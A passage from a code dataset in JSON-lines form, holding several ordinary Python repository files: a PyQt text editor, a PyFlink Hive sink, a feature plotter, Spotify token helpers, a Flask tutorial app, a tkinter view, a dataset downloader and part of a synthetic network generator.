hbox.addWidget(self.todo_text)\n\n self.vbox.addLayout(hbox)\n\n def OpenFile(self):\n dlg = QFileDialog()\n dlg.exec_()\n self.file = dlg.selectedFiles()[0]\n \n with open(self.file, \"r\") as f:\n data = f.read()\n self.todo_text.setText(data)\n\n def SaveFile(self):\n if self.file != \"\":\n with open(self.file, \"w\") as f:\n f.write(self.todo_text.toPlainText())\n QMessageBox.information(self, self.title, \"File saved!\")\n else:\n QMessageBox.information(self, self.title, \"File can't saved!\")\n\n\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n window = Window(\"Text Editor\", (100, 100, 1300, 800), \"../img/icon.jpg\")\n app.setStyle(\"Windows\")\n app.exec_()","repo_name":"alikemalcelik42/Text-Editor","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1929,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"20107863869","text":"import sys\nfrom datetime import date, datetime\nfrom pyflink.table import EnvironmentSettings, TableEnvironment, SqlDialect\nfrom pyflink.table import types as FT\nfrom pyflink.table.catalog import HiveCatalog\n\ndef to_hive_type(data_type):\n if isinstance(data_type, (FT.CharType, FT.VarCharType)):\n return 'STRING'\n elif isinstance(data_type, FT.DecimalType):\n return f'DECIMAL({data_type.precision},{data_type.scale})'\n elif isinstance(data_type, (FT.TimestampType, FT.LocalZonedTimestampType)):\n return 'TIMESTAMP'\n elif isinstance(data_type, FT.ArrayType):\n 
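# recurse on the element type so nested containers (e.g. ARRAY<MAP<STRING, DOUBLE>>) are translated too\n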
return f'ARRAY<{to_hive_type(data_type.element_type)}>'\n elif isinstance(data_type, FT.MapType):\n return f'MAP<{to_hive_type(data_type.key_type)}, {to_hive_type(data_type.value_type)}>'\n elif isinstance(data_type, FT.RowType):\n fields = ',\\n'.join([f'`{f.name}`: {to_hive_type(f.data_type)}' for f in data_type])\n return f'STRUCT<\\n{fields}\\n>'\n elif isinstance(data_type, (FT.BooleanType, FT.TinyIntType, FT.SmallIntType, FT.IntType, FT.BigIntType, FT.FloatType, FT.DoubleType, FT.DateType)):\n return data_type.type_name()\n else:\n raise TypeError(f'Unsupported data type {type(data_type)} in hive')\n \ndef to_hive_schema(schema, partition_fields=[]):\n partition_fields = set(partition_fields)\n fields = [] # ordinary fields\n partitions = [] # partition fields\n for i in range(schema.get_field_count()):\n name = schema.get_field_name(i)\n line = f'`{name}` {to_hive_type(schema.get_field_data_type(i))}'\n if name in partition_fields:\n partitions.append(line)\n else:\n fields.append(line)\n return ',\\n'.join(fields), '\\n'.join(partitions)\n\nif __name__ == '__main__':\n b_set = EnvironmentSettings.in_batch_mode()\n bt_env = TableEnvironment.create(environment_settings=b_set)\n bt_conf = bt_env.get_config()\n \n bt_env.register_catalog('hive', HiveCatalog('hive', default_database=sys.argv[1], hive_conf_dir=sys.argv[2]))\n bt_env.use_catalog('hive')\n table = bt_env.from_elements(\n elements = [(\n 'Alice',\n 1,\n ['hello', 'world'],\n {'lat':30.0, 'lon':119.0},\n datetime.now(),\n date.today(),\n )],\n schema = FT.RowType([\n FT.RowField('name', FT.VarCharType(0x7fffffff)),\n FT.RowField('age', FT.IntType()),\n FT.RowField('tags', FT.ArrayType(FT.VarCharType(0x7fffffff))),\n FT.RowField('geo', FT.RowType([\n FT.RowField('lat', FT.DoubleType()),\n FT.RowField('lon', FT.DoubleType()),\n ])),\n FT.RowField('update_time', FT.TimestampType(3)),\n FT.RowField('partition_date', FT.DateType()),\n ])\n )\n\n fields, partitions = to_hive_schema(table.get_schema(), ['partition_date'])\n bt_conf.set_sql_dialect(SqlDialect.HIVE)\n sql = f'''\n CREATE TABLE IF NOT EXISTS {sys.argv[3]} (\n {fields}\n )\n PARTITIONED BY ({partitions})\n STORED AS ORC\n '''\n print(sql)\n bt_env.execute_sql(sql)\n table.insert_into(sys.argv[3])\n bt_env.execute('hive_sink')\n\n","repo_name":"mvpboss1004/pyflink_examples","sub_path":"hive_sink/hive_sink.py","file_name":"hive_sink.py","file_ext":"py","file_size_in_byte":3219,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"31440895736","text":"#!/usr/bin/env python3\n\n# Standard modules\nimport logging\nlogging.basicConfig(level=logging.INFO)\nimport sys\nimport copy\n# External modules\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\ndef main():\n '''\n Loads a npy feature tensor and plot it in a single image\n '''\n if len(sys.argv) != 2:\n logging.error(\"Usage : {} file.npy\".format(sys.argv[0]))\n sys.exit(1)\n\n # Load the data\n logging.info(\"Loading {}\".format(sys.argv[1]))\n with open(sys.argv[1], 'rb') as f:\n data = np.load(f).ravel()\n\n # We build a squared image\n size = data.size\n N = int(np.ceil(np.sqrt(data.size)))\n logging.info(\"Feature space size : {}\".format(size))\n\n # Fill in the first elements with our data\n img = np.zeros((N, N), dtype=float)\n img[:] = np.nan\n img.reshape(-1)[:size] = data[::]\n img = np.clip(img, 0, 1)\n\n cmap = copy.copy(matplotlib.cm.get_cmap())\n cmap.set_bad(color='white')\n\n plt.figure()\n plt.imshow(img)\n 
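# --- Added illustrative aside (not in the original script) ---\n    # Only `size` of the N*N cells hold real feature values; the rest stay NaN\n    # and render in the colormap's \"bad\" color set above. A quick, optional\n    # log of that padding fraction (assumes `size` and `N` from above):\n    logging.info(\"Padding fraction: {:.1%}\".format(1.0 - size / float(N * N)))\n    # --- End aside ---\n    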
plt.gca().axis('off')\n    filename = '{}.png'.format(sys.argv[1][:-4])\n    plt.savefig(filename, bbox_inches='tight')\n    logging.info(\"{} saved\".format(filename))\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"jeremyfix/pytorch_feature_extraction","sub_path":"plot_features.py","file_name":"plot_features.py","file_ext":"py","file_size_in_byte":1209,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"10899364405","text":"from django.utils import timezone\nfrom .models import SpotifyToken\nfrom datetime import timedelta\nfrom requests import post, put, get\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom .credentials import CLIENT_ID, CLIENT_SECRET\n\nBASE_URL = 'https://api.spotify.com/v1/me/'\n\ndef get_user_tokens(session_id):\n    user_tokens = SpotifyToken.objects.filter(user=session_id)\n    if user_tokens.exists():\n        return user_tokens[0]\n    else:\n        return\n\n\ndef update_or_create_user_tokens(session_id, access_token, token_type, expires_in, refresh_token):\n\n    #checking if the user already has a token\n    tokens = get_user_tokens(session_id)\n\n    expires_in = timezone.now() + timedelta(seconds=expires_in)\n\n    #updating the user token\n    if tokens:\n        tokens.access_token = access_token\n        tokens.token_type = token_type\n        tokens.expires_in = expires_in\n        tokens.save(update_fields=['access_token', 'token_type', 'expires_in'])\n\n    #creating a new user token\n    else:\n        tokens = SpotifyToken(\n            user=session_id,\n            access_token=access_token,\n            refresh_token=refresh_token,\n            token_type=token_type,\n            expires_in=expires_in\n        )\n        tokens.save()\n\n\ndef is_spotify_authenticated(session_id):\n    tokens = get_user_tokens(session_id)\n\n    #checking if authenticated\n    if tokens:\n\n        #checking if the token has expired or not\n        expiry = tokens.expires_in\n\n        #if token has expired, get a new token\n        if expiry <= timezone.now():\n            refresh_spotify_token(tokens, session_id)\n\n        return True\n\n    return False\n\n\ndef refresh_spotify_token(tokens, sessionId):\n    refresh_token = tokens.refresh_token\n\n\n    #getting new token\n    response = post('https://accounts.spotify.com/api/token', data={\n        'grant_type': 'refresh_token',\n        'refresh_token' :refresh_token,\n        'client_id' : CLIENT_ID,\n        'client_secret' : CLIENT_SECRET\n    }).json()\n\n    access_token = response.get('access_token')\n    token_type = response.get('token_type')\n    expires_in = response.get('expires_in')\n\n\n    update_or_create_user_tokens(sessionId, access_token, token_type, expires_in, refresh_token)\n\n\n#to handle api request to spotify\ndef execute_spotify_api_request(session_id, endpoint, post_=False, put_=False):\n\n    tokens = get_user_tokens(session_id)\n    if tokens == None:\n        return Response(\n            {'not Found': 'Login with spotify'},\n            status=status.HTTP_404_NOT_FOUND)\n\n    access_token = tokens.access_token\n    headers={\n        'Content-Type':'application/json',\n        'Authorization':f'Bearer {access_token}'\n    }\n\n    if post_:\n        res = post(endpoint, headers=headers)\n        print(res.json())\n\n    if put_:\n        res = put(endpoint, headers=headers)\n        print(res.json())\n\n    res = get(endpoint, {}, headers=headers)\n\n    try:\n        return res.json()\n    except:\n        return {'error': 'Issue with request'}\n\n\ndef play_song(session_id):\n    endpoint = 'https://api.spotify.com/v1/me/player/play'\n    return execute_spotify_api_request(session_id, endpoint, put_=True)\n\n\ndef pause_song(session_id):\n    endpoint = 'https://api.spotify.com/v1/me/player/pause'\n    return execute_spotify_api_request(session_id, endpoint, put_=True)
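\n\n\n# --- Added usage sketch (not part of the original module) ---\n# The helpers above and below all funnel through execute_spotify_api_request();\n# a read-only endpoint works the same way, just without the post_/put_ flags.\n# The endpoint used here is Spotify's documented \"currently playing\" route;\n# treat this as an illustrative sketch rather than project code.\ndef current_song(session_id):\n    endpoint = 'https://api.spotify.com/v1/me/player/currently-playing'\n    return execute_spotify_api_request(session_id, endpoint)\n# --- End sketch ---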
\n\n\ndef skip_song(session_id):\n    endpoint = 'https://api.spotify.com/v1/me/player/next'\n    return execute_spotify_api_request(session_id, endpoint, post_=True)","repo_name":"azhussainn/Music-App-Rumba","sub_path":"spotify/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3525,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"18683167231","text":"from flask import Flask, render_template, session\nimport configs\nfrom exts import db\n\n\napp = Flask(__name__)\n# Load the configuration file\napp.config.from_object(configs)\n# Initialize\ndb.init_app(app)\n\n\n@app.route('/session/')\ndef ses():\n    session['username'] = 'zhangsan'\n    session.permanent = True\n    return session.get('username')\n\n\n@app.route('/db/')\ndef data():\n    \"\"\"Database CRUD operations\"\"\"\n    # Create\n    # article1 = Article(title='aaa', content='bbb') # create a data instance\n    # db.session.add(article1) # stage the insert\n    # db.session.commit() # commit the transaction\n\n    # user1 = User(username='zhang')\n    # # Option 1: add an article, linking the author by id\n    # article1 = Article(title='aaa', content='bbb', author_id=1)\n    # # Option 2: attach the article to the author \"zhang\"\n    # article2 = Article(title='ccc', content='ddd')\n    # article2.author = User.query.filter(User.username == 'zhang').first()\n    # db.session.add(user1)\n    # db.session.add(article1)\n    # db.session.add(article2)\n    # db.session.commit()\n    # Add articles and attach tags\n    # article3 = Article(title='a', content='nihao', author_id=1)\n    # article4 = Article(title='b', content='hello world', author_id=1)\n    # tag1 = Tag(name='111')\n    # tag2 = Tag(name='222')\n    # article3.tags.append(tag1)\n    # article3.tags.append(tag2)\n    # article4.tags.append(tag1)\n    # db.session.add(article3)\n    # db.session.add(article4)\n    # db.session.add(tag1)\n    # db.session.add(tag2)\n    # db.session.commit()\n\n    # Read\n    # articles = Article.query.filter(Article.title == 'aaa').all() # returns a list of Query objects (first() takes the first one)\n    # for i in articles:\n    #     print({'title': i.title, 'content': i.content}) # i.title is the title attribute of object i\n    # # Find the author name of the article titled 'aaa'\n    # article = Article.query.filter(Article.title == 'aaa').first()\n    # print(article.author.username)\n    # # Find all articles written by the author 'zhang'\n    # user = User.query.filter(User.username == 'zhang').first()\n    # result = user.articles\n    # for i in result:\n    #     print(i.title)\n    # Find all tags of the article titled 'a'\n    # article = Article.query.filter(Article.title == 'a').first()\n    # result = article.tags\n    # for i in result:\n    #     print(i.name)\n\n    # Update\n    # # 1. find the data to modify\n    # article1 = Article.query.filter(Article.title == 'aaa').first()\n    # # 2. change its contents\n    # article1.title = 'ccc'\n    # article1.content = 'ddd'\n    # # 3. commit the transaction\n    # db.session.commit()\n\n    # Delete\n    # # 1. find the data to delete\n    # article2 = Article.query.filter(Article.title == 'ccc').first()\n    # # 2. delete the data\n    # db.session.delete(article2)\n    # # 3. commit the transaction\n    # db.session.commit()\n    return 'hello world'\n\n\n@app.route('/<is_login>')\ndef index(is_login):\n    class Person(object):\n        name = '包拯'\n        age = 45\n\n    context = {\n        'username': u'知了课堂',\n        'sex': u'男',\n        'age': 18,\n        'Person': Person,\n        'websites': {\n            'baidu': 'www.baidu.com',\n            'sina': 'www.sina.com.cn'\n        }\n    }\n    if is_login == '1':\n        return render_template('index.html', context=context)\n    else:\n        return render_template('index.html')\n\n\n@app.route('/books/')\ndef for_book():\n    books = [\n        {\n            'name': '三国演义',\n            'price': 200\n        },\n        {\n            'name': '红楼梦',\n            'price': 200\n        },\n        {\n            'name': '水浒传',\n            'price': 200\n        },\n        {\n            'name': '西游记',\n            'price': 200\n        }\n    ]\n    return render_template('books.html', books=books)\n\n\nif __name__ == '__main__':\n    app.run()\n
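\n# --- Added illustrative sketch (not part of the original file) ---\n# The commented-out CRUD examples above presuppose models roughly like the\n# following (hypothetical reconstruction; the real User/Article/Tag models\n# would live in a separate module that imports db from exts):\n#\n#     class User(db.Model):\n#         id = db.Column(db.Integer, primary_key=True)\n#         username = db.Column(db.String(50))\n#         articles = db.relationship('Article', backref='author')\n#\n#     class Article(db.Model):\n#         id = db.Column(db.Integer, primary_key=True)\n#         title = db.Column(db.String(100))\n#         content = db.Column(db.Text)\n#         author_id = db.Column(db.Integer, db.ForeignKey('user.id'))\n# --- End sketch ---\n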
","repo_name":"jiyabing/learning","sub_path":"开班笔记/个人项目/flask_pro/flask_test/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"16061434150","text":"import tkinter as tk\n\n\nclass Page3View(tk.Frame):\n    \"\"\" Page 3 \"\"\"\n\n    def __init__(self, parent, submit_callback):\n        \"\"\" Initialize Page 3 \"\"\"\n        tk.Frame.__init__(self, parent, width=800, height=800)\n        self._parent = parent\n\n        self._submit_callback = submit_callback\n\n        self._data = [\"first_name\", \"last_name\", \"member_num\", \"annual_salary\", \"contract_years_length\", \"type\"]\n\n        self._create_widgets()\n\n    def _create_widgets(self):\n        \"\"\" Creates the widgets for Page 3 \"\"\"\n\n        self._entry_name = tk.Listbox(self)\n        self._entry_name.grid(row=1,column=1)\n\n        self._button = tk.Button(self,\n                                 text=\"Refresh\",\n                                 command=self._submit_callback)\n        self._button.grid(row=2,column=1,padx=20)\n\n    def set_form_data(self, all):\n        self._entry_name.delete(0, tk.END)\n        for item in all:\n            self._entry_name.insert(tk.END, \"%d. %s %s (%s)\" % (item['id'], item['first_name'], item['last_name'],\n                                                                item['member_num']))\n\n\n\n\n\n","repo_name":"michaeljacinto/PlayerManager","sub_path":"View/page3_view.py","file_name":"page3_view.py","file_ext":"py","file_size_in_byte":1116,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"654079766","text":"import os\r\nfrom download_gdrive import *\r\n\r\nfile_id = '1rPcbnanuApZeo2uc7h55OneBkbcFCnnf'\r\nchpt_path = './datasets/'\r\nif not os.path.isdir(chpt_path):\r\n\tos.makedirs(chpt_path)\r\ndestination = os.path.join(chpt_path, 'datasets.zip')\r\ndownload_file_from_google_drive(file_id, destination) \r\nunzip_file(destination, chpt_path)","repo_name":"NVIDIA/vid2vid","sub_path":"scripts/download_datasets.py","file_name":"download_datasets.py","file_ext":"py","file_size_in_byte":322,"program_lang":"python","lang":"en","doc_type":"code","stars":8394,"dataset":"github-code","pt":"37"}
+{"seq_id":"8354672763","text":"\"\"\"\n    Class for generation and management of synthetic single-layer networks according to the XOR model.\n    It assumes a mixed effect of the community and hierarchical latent structures.\n\n    Possible options: model with s permuted, model with s not permuted.\n\"\"\"\n\nimport math\nimport warnings\nimport numpy as np\nimport pandas as pd\nimport networkx as nx\nimport scipy.sparse as sparse\n\nfrom numba import jit\n\n\nclass SyntNetXOR(object):\n\n    def __init__(self, m=1, N=100, K=3, l=1, prng=42, avg_degree=10., mu=0.5, structure='assortative', label='test',\n                 beta=1e4, gamma=0.5, delta0=0.01, eta=0.5, ag=0.6, bg=1., corr=0., over=0., means=(), stds=(),\n                 verbose=0, folder='../../data/input', L1=False, output_parameters=False, output_adj=False,\n                 outfile_adj='None', use_leagues=False, permute=True):\n        self.N = N # network size (node number)\n        self.m = m # number of networks to be generated\n        self.prng = prng # seed random number generator\n        self.label = label # label (associated uniquely with the set of inputs)\n        self.folder = folder # input data folder path\n        self.output_parameters = output_parameters # flag for storing the parameters\n        self.output_adj = output_adj # flag for storing the generated adjacency matrix\n        self.outfile_adj = outfile_adj # name for saving the adjacency matrix\n        self.avg_degree = avg_degree # required average degree\n        self.delta0 = delta0 # outgroup 
interaction probability\n self.permute = permute # flag for permuting s variables (not overlapping option)\n\n if verbose > 2 and not isinstance(verbose, int):\n raise ValueError('The verbosity parameter can only assume values in {0,1,2}!')\n self.verbose = verbose # verbosity flag\n\n if mu < 0 or mu > 1:\n raise ValueError('The Binomial parameter mu has to be in [0, 1]!')\n if mu == 1: mu = 1 - 1e-13\n if mu == 0: mu = 1e-13\n self.mu = mu # sigma latent variable a prior mean\n\n ''' Community-related inputs '''\n if structure not in ['assortative', 'disassortative', 'core-periphery', 'directed-biased']:\n raise ValueError('The available structures for the affinity matrix w '\n 'are: assortative, disassortative, core-periphery '\n 'and directed-biased!')\n self.structure = structure # the affinity matrix structure\n self.K = K # number of communities\n if eta <= 0 and L1:\n raise ValueError('The Dirichlet parameter eta has to be positive!')\n self.eta = eta # eta parameter of the Dirichlet distribution\n if ag <= 0 and not L1:\n raise ValueError('The Gamma parameter alpha has to be positive!')\n self.ag = ag # alpha parameter of the Gamma distribution\n if bg <= 0 and not L1:\n raise ValueError('The Gamma parameter beta has to be positive!')\n self.bg = bg # beta parameter of the Gamma distribution\n self.L1 = L1 # flag for soft u,v generation preference, True -> Dirichlet, False -> Gamma\n if (corr < 0) or (corr > 1):\n raise ValueError('The correlation parameter has to be in [0, 1]!')\n self.corr = corr # correlation between u and v synthetically generated\n if (over < 0) or (over > 1):\n raise ValueError('The overlapping parameter has to be in [0, 1]!')\n self.over = over # fraction of nodes with mixed membership\n\n ''' Ranking-related inputs '''\n self.use_leagues = use_leagues\n if not self.use_leagues:\n l = 1\n self.l = l # the number of Gaussian for s\n if len(means) == self.l:\n self.means = means # means for s\n else:\n self.means = None\n if len(stds) == self.l:\n self.stds = stds # standard deviations for s\n else:\n self.stds = None\n self.beta = beta # inverse temperature parameter\n if gamma <= 0:\n raise ValueError('The spring constant gamma has to be positive!')\n self.gamma = gamma # spring constant for (s, origin)\n\n def EitherOr_planted_network(self, parameters=None):\n \"\"\"\n Generate a directed, possibly weighted network by using the XOR model.\n Steps:\n 1. Generate or load the latent variables.\n 2. Extract A_ij entries (network edges) from a combination of Poisson\n distributions;\n\n Parameters\n ----------\n parameters : object\n Latent variables z, s, u, v and w.\n Returns\n ----------\n G : Digraph\n DiGraph NetworkX object. 
Self-loops allowed.\n \"\"\"\n\n # Set seed random number generator\n prng = np.random.RandomState(self.prng)\n\n ''' Latent variables '''\n if parameters is None:\n # Generate latent variables\n self.z, self.s, self.u, self.v, self.w, nodes_s = self._generate_lv(prng)\n else:\n # Set latent variables\n self.z, self.s, self.u, self.v, self.w, nodes_s = parameters\n\n k_sr, k_mt, c, eps = 0., 0., 0., 0.\n\n if (self.z == 0).all():\n warnings.warn('All Z entries are 0: Generation with MT model.')\n self.s = np.zeros(self.N)\n S = np.zeros((self.N, self.N))\n k_mt = self.avg_degree\n else:\n # Compute normalization term for c_sr\n deltas = delta_scores(self.s)\n expH = np.exp(-self.beta * 0.5 * np.power((deltas - 1), 2))\n # Compute c_sr\n eps = 2 * self.mu * (1-self.mu) * self.delta0 * self.N\n k_sr = self.mu * (self.avg_degree - eps) * (self.mu**2 + (1-self.mu)**2)\n c = self.N * k_sr / (self.mu * (self.mu**2 + (1-self.mu)**2) * expH.sum())\n S = c * expH\n\n if (self.z == 1).all():\n warnings.warn('All Z entries are 1: Generation with SR model.')\n self.u = np.zeros((self.N, self.K))\n self.v = np.zeros((self.N, self.K))\n self.w = np.zeros((self.K, self.K))\n M = np.zeros((self.N, self.N))\n else:\n # Compute normalization term for c_mt\n M = np.einsum('ik,jq->ijkq', self.u, self.v)\n M = np.einsum('ijkq,kq->ij', M, self.w)\n # Update w with c_mt\n k_mt = self.avg_degree - k_sr - eps\n c_mt = self.N * k_mt / ((1 - self.mu) * (self.mu**2 + (1-self.mu)**2) * M).sum()\n self.w *= c_mt\n M *= c_mt\n\n ''' Network generation '''\n edge_type = self.z.copy(); edge_type[edge_type == 0] = -1 # sigma_i\n edge_mask = np.outer(edge_type, edge_type) # 1: high prob, -1: low prob (sigma_i * sigma_j)\n model_id = np.vstack([self.z] * self.N) # 0: MT, 1: SR, to be used only for coherent couples (Z_ij)\n\n ingroup = prng.poisson(model_id * S + (1 - model_id) * M, (self.N, self.N))\n outgroup = prng.poisson(self.delta0 * np.ones((self.N, self.N)), (self.N, self.N))\n\n A = np.where(edge_mask == -1, outgroup, ingroup)\n G = nx.from_numpy_matrix(A, create_using = nx.DiGraph)\n Z = np.where(A > 0, model_id, 0.5)\n\n ''' Network post-processing '''\n totM = np.sum(A)\n nodes = list(G.nodes())\n A = nx.to_scipy_sparse_matrix(G, nodelist = nodes, weight = 'weight')\n\n # Keep largest connected component\n Gc = max(nx.weakly_connected_components(G), key = len)\n nodes_to_remove = set(G.nodes()).difference(Gc)\n G.remove_nodes_from(list(nodes_to_remove))\n\n nodes = list(G.nodes())\n self.z = self.z[nodes]\n self.s = self.s[nodes]\n self.u = self.u[nodes]\n self.v = self.v[nodes]\n self.N = len(nodes)\n S = np.take(S, nodes, 1)\n S = np.take(S, nodes, 0)\n M = np.take(M, nodes, 1)\n M = np.take(M, nodes, 0)\n model_id = np.take(model_id, nodes, 1)\n model_id = np.take(model_id, nodes, 0)\n edge_mask = np.take(edge_mask, nodes, 1)\n edge_mask = np.take(edge_mask, nodes, 0)\n\n\n if self.verbose > 0:\n avg_w_deg = np.round(totM / float(G.number_of_nodes()), 3)\n avg_deg = np.round(G.number_of_edges() / float(G.number_of_nodes()), 3)\n\n print(f'Number of links in the upper triangular matrix: {sparse.triu(A, k = 1).nnz}\\n'\n f'Number of links in the lower triangular matrix: {sparse.tril(A, k = -1).nnz}')\n print(f'Sum of weights in the upper triangular matrix: {np.round(sparse.triu(A, k = 1).sum(), 2)}\\n'\n f'Sum of weights in the lower triangular matrix: {np.round(sparse.tril(A, k = -1).sum(), 2)}')\n print(f'Removed {len(nodes_to_remove)} nodes, because not part of the largest connected component')\n 
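# --- Added illustrative aside (not in the original class) ---\n            # Optional sanity check one might add here: the realized average\n            # degree should land close to the requested one for large N\n            # (uses avg_deg computed a few lines above).\n            print(f'Requested average degree: {self.avg_degree}, realized: {avg_deg}')\n            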
print(f'Number of nodes: {G.number_of_nodes()} \\n'\n f'Number of edges: {G.number_of_edges()}')\n print(f'Average degree (E/N): {avg_deg}')\n print(f'Average weighted degree (M/N): {avg_w_deg}')\n\n # Sparsity coefficient (decimal)\n sparsity_coef = lambda x: sum(x.flatten() == 0) / x.flatten().shape[0]\n if self.verbose == 2:\n print(f'Ratio: {self.mu}')\n print(f'z sparsity (~ 1 - Ratio) (%): {sparsity_coef(self.z) * 100}')\n print(f'M sparsity (%): {sparsity_coef(M) * 100}')\n print(f'S sparsity (%): {sparsity_coef(S) * 100}')\n print(f'c: {c}')\n print(f'L1: {self.L1}')\n\n if self.output_parameters:\n self._output_results(nodes, nodes_s, k_sr, k_mt, c, edge_mask, model_id)\n\n if self.output_adj:\n self._output_adjacency(G, outfile = self.outfile_adj)\n\n return G\n\n def _generate_lv(self, prng=None):\n \"\"\"\n Generate z, s, u, v, w latent variables.\n Parameters\n ----------\n prng : random generator container\n Seed for the random number generator.\n Returns\n ----------\n z : Numpy array\n Matrix NxN of model indicators (binary).\n\n s : Numpy array\n N-dimensional array of real ranking scores for each node.\n\n u : Numpy array\n Matrix NxK of out-going membership vectors, positive element-wise.\n With unitary L1 norm computed row-wise.\n\n v : Numpy array\n Matrix NxK of in-coming membership vectors, positive element-wise.\n With unitary L1 norm computed row-wise.\n\n w : Numpy array\n Affinity matrix KxK. Possibly None if in pure SpringRank.\n Element (k,h) gives the density of edges going from the nodes\n of group k to nodes of group h.\n\n nodes_s : Numpy array\n Result of the random permutation applied to the node IDs (if required).\n Can be used for inverting the permutation and induce the block structure\n generated by the leagues on the adjacency matrix.\n \"\"\"\n if prng is None:\n # Set seed random number generator\n prng = np.random.RandomState(seed = 42)\n\n # Generate z through binomial distribution\n z = prng.binomial(1, self.mu, self.N)\n # Generate s through gaussians\n s, nodes_s = ranking_scores(prng, self.use_leagues, self.permute, self.gamma, self.beta, self.N, self.l,\n self.means, self.stds)\n # Generate u,v,w for possibly overlapping communities\n u, v = membership_vectors(prng, self.L1, self.eta, self.ag, self.bg, self.K, self.N, self.corr, self.over)\n w = affinity_matrix(self.structure, self.N, self.K, self.avg_degree)\n\n return z, s, u, v, w, nodes_s\n\n def _output_results(self, nodes, nodes_s, k_sr, k_mt, c, edge_mask, model_id):\n \"\"\"\n Output results in a compressed file.\n Parameters\n ----------\n nodes : list\n List of nodes IDs.\n nodes_s: Numpy array\n Result of the random permutation applied to the node IDs (if required)\n k_sr : float\n Fraction of average degree given by the hierarchical mechanism.\n k_mt : float\n Fraction of average degree given by the community mechanism.\n c : float\n Overall sparsity coefficient.\n edge_mask : Numpy array\n Mask that return the adjacency matrix entries representing in-group connections.\n model_id : Numpy array\n Node type vector.\n\n \"\"\"\n\n output_parameters = self.folder + 'results_' + self.label + '_' + str(self.prng)\n np.savez_compressed(output_parameters + '.npz', s = self.s, u = self.u, v = self.v,\n w = self.w, z = model_id, edge_mask = edge_mask, mu = self.mu, beta = self.beta,\n sigma = self.z, delta0 = self.delta0, k_sr = k_sr, k_mt = k_mt, c = c, nodes = nodes,\n nodes_s = nodes_s)\n if self.verbose:\n print()\n print(f'Parameters saved in: {output_parameters}.npz')\n print('To 
load: theta=np.load(filename), then e.g. theta[\"u\"]')\n\n    def _output_adjacency(self, G, outfile=None):\n        \"\"\"\n        Output the adjacency matrix. Default format is space-separated .csv\n        with 3 columns: node1 node2 weight\n\n        Parameters\n        ----------\n        G: Digraph\n            DiGraph NetworkX object.\n        outfile: str\n            Name of the adjacency matrix.\n        \"\"\"\n\n        if outfile is None:\n            outfile = 'syn_' + self.label + '_' + str(self.prng) + '.dat'\n\n        edges = list(G.edges(data = True))\n        try:\n            data = [[u, v, d['weight']] for u, v, d in edges]\n        except:\n            data = [[u, v, 1] for u, v, d in edges]\n\n        df = pd.DataFrame(data, columns = ['source', 'target', 'w'], index = None)\n        df.to_csv(self.folder + outfile, index = False, sep = ' ')\n        if self.verbose:\n            print(f'Adjacency matrix saved in: {self.folder + outfile}')\n\n\ndef ranking_scores(prng=None, mix=False, permute=False, gamma=0.01, beta=5., N=100, l=1, means=None, stds=None):\n    \"\"\"\n    Generate the ranking scores.\n\n    Parameters\n    ----------\n    prng : random generator container\n        Seed for the random number generator.\n    mix : bool\n        Flag for generating the ranking scores with a Gaussian mixture.\n    permute : bool\n        Flag for permuting the node before associating a ranking score to each of them,\n        i.e. the hierarchical block structure induced on the adjacency matrix is randomized.\n    gamma : float\n        The spring constant for (s, origin).\n    beta : float\n        Inverse temperature parameter.\n    N : int\n        Number of nodes.\n    l : int\n        Number of leagues\n    means : list\n        List of means to be used for the scores generation.\n    stds : list\n        List of standard deviations to be used for the scores generation.\n\n    Returns\n    ----------\n    s : Numpy array\n        N-dimensional array of real ranking scores for each node.\n\n    nodes_s : Numpy array\n        Result of the random permutation applied to the node IDs (if required).\n        Can be used for inverting the permutation and induce the block structure\n        generated by the leagues on the adjacency matrix.\n    \"\"\"\n    if prng is None:\n        # Set seed random number generator\n        prng = np.random.RandomState(seed = 42)\n    if mix:\n        if means is None:\n            means = prng.randint(-5, 5, l)\n        if stds is None:\n            stds = prng.randint(0, 1, l)\n        s = np.concatenate([prng.normal(means[i], stds[i], N // l) for i in range(l - 1)])\n        if N % l:\n            s = np.concatenate([s, prng.normal(means[-1], stds[-1], N - s.shape[0])])\n        if permute:\n            # shuffle s in order to not have a ranking structure overlapped to the communities one\n            nodes_s = prng.permutation(N)\n            s = s[nodes_s]\n        else:\n            nodes_s = np.arange(N)\n    else:\n        # Generate s through factorized Gaussian, l0 = 0\n        s = prng.normal(0, 1. / np.sqrt(gamma * beta), N)\n        nodes_s = np.arange(N)\n\n    return s, nodes_s\n\n\ndef membership_vectors(prng=None, L1=False, eta=0.5, alpha=0.6, beta=1, K=3, N=100, corr=0., over=0.):\n    \"\"\"\n    Compute the NxK membership vectors u, v using a Dirichlet or a Gamma distribution.\n    Parameters\n    ----------\n    prng: Numpy Random object\n        Random number generator container.\n    L1 : bool\n        Flag for parameter generation method. 
True for Dirichlet, False for Gamma.\n    eta : float\n        Parameter for Dirichlet.\n    alpha : float\n        Parameter (alpha) for Gamma.\n    beta : float\n        Parameter (beta) for Gamma.\n    N : int\n        Number of nodes.\n    K : int\n        Number of communities.\n    corr : float\n        Correlation between u and v synthetically generated.\n    over : float\n        Fraction of nodes with mixed membership.\n    Returns\n    -------\n    u : Numpy array\n        Matrix NxK of out-going membership vectors, positive element-wise.\n        Possibly None if in pure SpringRank or pure MultiTensor.\n        With unitary L1 norm computed row-wise.\n\n    v : Numpy array\n        Matrix NxK of in-coming membership vectors, positive element-wise.\n        Possibly None if in pure SpringRank or pure MultiTensor.\n        With unitary L1 norm computed row-wise.\n    \"\"\"\n    if prng is None:\n        # Set seed random number generator\n        prng = np.random.RandomState(seed = 42)\n    # Generate equal-size unmixed group membership\n    size = int(N / K)\n    u = np.zeros((N, K))\n    v = 